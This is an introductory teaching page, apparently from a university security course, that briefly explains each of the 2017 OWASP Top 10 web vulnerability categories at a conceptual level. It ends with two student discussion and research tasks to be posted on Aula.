Skip to content

The OWASP top 10

Understanding the common threats to our systems and applications helps us to identify elements that are likely to have flaws.

Important

These lists are meant for guidance. While they can tell us common areas where flaws may be found, and give us some idea of the risks. Focusing only on items in the list, means that other security issues may be missed.

One such list is the OWASP top 101 web vulnerabilities.

The OWASP Foundation has been compiling a list of what it classes as the most prevalent web vulnerabilities since 2004. The list is compiled by a panel of industry experts, based on analysis of existing applications and known vulnerabilities.

The most recent version (2017) looked at over 50,000 applications, and 2.3 million vulnerabilities. These are then categorised and ranked according to the risk.

The vulnerabilities are judged on:

  • Ease of Exploitability
  • Prevalence
  • Detectability
  • Business Impact

Note

The numbering scheme may make it seem like a list of the most common attacks. However, its the risk related to this type of attack.

Its interesting to note that the Likelihood of attack is not factored into the rating.

Looking at the OWASP top 10

In this section we will take a brief look at the top 10. We will cover some of these in detail over the next couple of weeks.

You can find a more detailed report on the OWASP top 10 Document

  1. Injection:

    Including SQL, No-SQL, LDAP injection. This happens when malicious code is sent to the server as part of a command or query.

    This may allow the attacker to execute commands on the server, or access data.

  2. Broken Authentication:

    Functions related to authentication and session handling are not implemented correctly.

    This can allowing an attacker to compromise passwords, or session tokens and assume other users identities.

  3. Sensitive Data Exposure

    Where the web application does not protect sensitive information. For example, making other users data visible with a modified request. Other risks include not encrypting data when it is stored, or transmitted across the network.

  4. XML External Entities

    Some XML parsers will allow you to execute code within the XML files, or access other data on the server.

  5. Broken Access Control

    Where restrictions on user privileges are not properly enforced. This means that an attacker can access files or data that their privileges should deny.

  6. Security Misconfiguration

    Where insecure site or library configurations are used. This may be the result of insecure default configurations, leaving insecure options turned on, or mistakes in the config settings.

  7. Cross Site Scripting.

    XSS attacks are where untrusted user-supplied data is displayed in a web-page. This can allow an attacker to execute scripts in the victims browser.

  8. Insecure Deserialization.

    Where components that deal with accepting and processing user-supplied data (such as JSON files) are insecure. This can commonly lead to Remote code execution on the server, but also Injection, or XSS style attacks

  9. Using Components with Known Vulnerabilities.

    Applications or API's with known vulnerabilities can lead to any of the above attacks occurring. This becomes more important when we realise that new vulnerabilities can be discovered in components after we choose to use them.

  10. Insufficient Logging and Monitoring.

    While this may not directly lead to the application being compromised. We know that audit is vital to understanding and responding to attacks.

Script Kiddies #ScriptKiddies

Several of the vulnerabilities have been around since the first release of the OWASP Top 10. Others (Such as SQLi) are well known issues, and easily exploitable using tools downloaded from the web.

  • Are there any of the Top 10 that surprise you?
  • Why do you think that well known vulnerabilities are still in the top 10?

Post in the Feed on Aula using the tag #ScriptKiddies

OWASP top 10 #OSASP

Pick one of the OWASP top 10, and research it in more detail.

Put together a short (2 paragraph) report on the issue showing:

  • How does this issue occur
  • Give an Real world Example of this issue

Post in the Feed on Aula using the tag #OWASP

Back to top